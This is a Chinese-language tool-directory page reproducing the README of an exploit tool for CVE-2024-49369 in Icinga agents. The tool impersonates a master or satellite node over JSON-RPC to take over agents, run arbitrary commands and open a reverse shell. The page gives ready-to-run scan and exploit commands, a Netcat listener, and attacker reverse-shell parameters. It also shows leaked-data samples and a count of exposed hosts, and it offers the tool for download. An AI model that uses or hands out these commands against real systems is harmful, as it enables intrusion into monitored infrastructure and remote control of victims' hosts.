Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-49369 — CVE-2024-49369 在 Icinga 中的漏洞利用工具,支持子网扫描、通过 JSON-RPC 冒充实现代理接管、任意命令执行以及反弹 Shell。 | Kitploit
工具/GitHubGitHub/quantum-sicarius/cve-2024-49369
漏洞利用信息收集网络安全渗透测试命令与控制远程访问工具
GitHubquantum-sicarius/cve-2024-49369

CVE-2024-49369

CVE-2024-49369 在 Icinga 中的漏洞利用工具,支持子网扫描、通过 JSON-RPC 冒充实现代理接管、任意命令执行以及反弹 Shell。

查看仓库
2191年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-49369

概述

该漏洞利用 Icinga JSON-RPC 协议,针对运行 Icinga agent 的被监控节点进行利用。通过伪装成 Master/Satellite 实例,攻击者有可能接管 agent、执行任意命令或获取敏感信息。


如何使用

扫描

要扫描子网中易受攻击的 agent,请运行以下命令:

python3 main.py scan --subnet 192.168.0.0/24 --vuln --batch 25

该工具将以每批 25 个 IP 的方式扫描指定子网。它通过 JSON-RPC 协议发送 Icinga::HELLO 消息,并识别响应的 agent 及其版本。


利用

如果端点上启用了配置和命令执行(运行 Icinga agent 的监控节点的默认设置),攻击者可以:

  1. 伪装成 Master/Satellite 实例。
  2. 更新端点配置。
  3. 在端点上执行任意命令。

这可能导致完全系统入侵(取决于服务用户)或受限访问。

先决条件

  • 网络中断或目标重启:Icinga agent 会自动拒绝来自同一 Master/Satellite 实例的新连接,直到现有连接被切断。

当父节点仍然连接时,漏洞利用连接在日志中会如下所示:

[2024-12-11 09:13:03 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48120
[2024-12-11 09:13:04 -0500] information/ApiListener: New client connection for identity 'my_satellite' from [::ffff:192.168.0.1]:48124 (certificate validation failed: code 18: self signed certificate)
[2024-12-11 09:13:04 -0500] warning/ApiListener: No data received on new API connection from [::ffff:192.168.0.1]:48124 for identity 'my_satellite'. Ensure that the remote endpoints are properly configured in a cluster setup.

我们可以看到该节点容易受到攻击,因为集群的警告被触发,这意味着当前 satellite 仍然已连接,但该 agent 将我们视为有效的父节点。

步骤

  1. 启动一个 Netcat 监听器用于反向 shell:

    nc -lvnp 9001
    
  2. 启动利用程序:

    python3 main.py exploit --host 192.168.0.5 --node-cn icinga_master --zone master --revip 192.168.0.1 --revport 9001
    
    • --host:目标 agent 的 IP 地址。
    • --node-cn:要伪装的 Master/Satellite 的通用名称。
    • --zone:目标区域名称。默认为 master。
    • --revip:攻击者的 IP 地址,用于反向 shell。
    • --revport:攻击者的端口,用于反向 shell。

该命令会发起重复的连接尝试。一旦目标 agent 与其当前父节点断开连接,该工具便会接管,发送和接收检查。

示例 Payload

该工具使用一个基于 Perl 的反向 shell 作为其创建的新检查的一部分。


信息泄露

即使目标上禁用了配置和命令执行,攻击者仍可能通过观察发送给 agent 的检查结果来获取敏感数据。

示例响应数据

{
  "jsonrpc": "2.0",
  "method": "config::UpdateObject",
  "params": {
    "config": "object Downtime ...",
    "name": "icinga-agent!load!9856e6b2...",
    "type": "Downtime",
    "version": 1733899523.67197
  }
}
{
  "jsonrpc": "2.0",
  "method": "event::SetLastCheckStarted",
  "params": {
    "host": "icinga-agent",
    "last_check_started": 1733899492.313578,
    "service": "icinga"
  },
  "ts": 1733899492.313714
}

这些响应可能泄露敏感配置、调度数据,甚至被监控服务的结果。


影响

在 Censys 上目前有 24,003 个主机暴露了 Icinga 端口。抽查表明,大多数主机仍在运行易受攻击的 Icinga 版本。


鸣谢

本研究基于 Icinga 博客 中讨论的工作。


注意事项

  • 请始终负责任地使用此工具,且仅限于授权的安全测试范围内。
  • 漏洞利用可能带来严重后果。使用前请确认拥有合法权限。
下载工具